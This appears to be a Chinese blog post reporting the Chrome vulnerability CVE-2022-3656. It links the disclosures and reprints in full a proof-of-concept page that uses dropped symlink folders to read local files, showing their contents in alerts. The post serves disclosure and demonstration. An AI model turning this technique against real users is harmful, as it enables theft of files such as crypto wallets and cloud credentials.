Google Chrome CVE-2022-3656 漏洞
2023-02-25 18:22:29 时间
Imperva Red Team 最近披露了一个名为 CVE-2022-3656 的漏洞,该漏洞影响超过 25 亿 Google Chrome 和基于 Chromium 的浏览器的用户。
此漏洞允许窃取敏感文件,例如加密钱包和云提供商凭据。
漏洞说明:
1. https://bugs.chromium.org/p/chromium/issues/detail?id=1345275#c34
2. https://www.imperva.com/blog/google-chrome-symstealer-vulnerability/
使用说明:
- 下载poc.zip文件并解压
- 导航到“fancy-poc”并提供文件 (python3 -m http.server)
- 打开http://localhost:8000并按照 PoC 说明进行操作
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<style>
* {
box-sizing: border-box;
}
html,
body {
margin: 0;
padding: 0;
overflow: hidden;
text-align: center;
-webkit-font-smoothing: antialiased;
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
.dropzone {
border: 3px dashed #3e3e3e;
display: flex;
justify-content: center;
align-items: center;
font-weight: bold;
height: 80vh;
text-transform: uppercase;
position: fixed;
top: 50%;
left: 50%;
width: 80%;
transform: translate(-50%, -50%);
}
.dropzone input {
top: 0;
left: 0;
opacity: 0;
display: block;
position: fixed;
transform: scale(1000);
}
button {
display: block;
margin-bottom: 10px;
}
</style>
</head>
<body>
<div class="dropzone">
Drop folder with symlinks here
<input onChange="handleFiles(event)" webkitdirectory multiple onClick="handleClick(event)" title=""
type="file" />
</div>
<script>
const dropzone = document.querySelector(".dropzone");
function handleFiles(event) {
document.body.innerHTML = '';
files = Array.from(event.target.files).filter(f => f.size > 0);
for (let file of files) {
let name = file.name;
let label = document.createElement("button");
label.innerText = name;
label.addEventListener('click', async () => {
const reader = new FileReader();
reader.onload = async () => {
alert(reader.result);
}
reader.onerror = console.error;
reader.readAsText(file);
});
document.body.appendChild(label);
}
}
function handleClick(event) {
event.preventDefault();
alert("Drag and drop a folder with symlinks here");
}
document.addEventListener("drop", function (event) {
dropzone.classList.remove("hover");
}, false);
document.addEventListener("dragleave", function (event) {
event.preventDefault();
dropzone.classList.remove("hover");
}, false);
document.addEventListener("dragover", function (event) {
event.preventDefault();
dropzone.classList.add("hover");
}, false);
</script>
</body>
</html>
相关文章
- 闻道Go语言,6月龄必知必会
- Go语言正/反向代理的姿势
- 你认识的C# foreach语法糖,真的是全部吗?
- PhpStudy 2016搭建-DVWA靶场
- c++——构造函数和析构函数
- 深入浅出学习Linux
- git相关问题解析,你想要的都有?
- Go | 闭包的使用
- linux安装stable diffusion2.0完整教程-还不会安装sd2.0?一篇文章教会你AI绘画
- arm Linux中dma的cache管理
- 嵌入式:数据处理指令详解
- golang go-sql-driver gorm 数据库报错 bad connection
- linux 命令之 ls 命令详解
- git help 查看命令手册
- 【6】python生成数据曲线平滑处理——(Savitzky-Golay 滤波器、convolve滑动平均滤波)方法介绍,推荐玩强化学习的小伙伴收藏
- 数据挖掘机器学习[四]---汽车交易价格预测详细版本{嵌入式特征选择(XGBoots,LightGBM),模型调参(贪心、网格、贝叶斯调参)}
- 像go 一样 打造.NET 单文件应用程序的编译器项目bflat 发布 7.0版本
- 解决idea登录github出现的invalid authentication data 404 not found以及登录 token 失效
- 虹科方案|将以太网连接添加到Dell EMC PowerVault™ ML3 SAS库
- Linux运维常用shell脚本之系统管理实例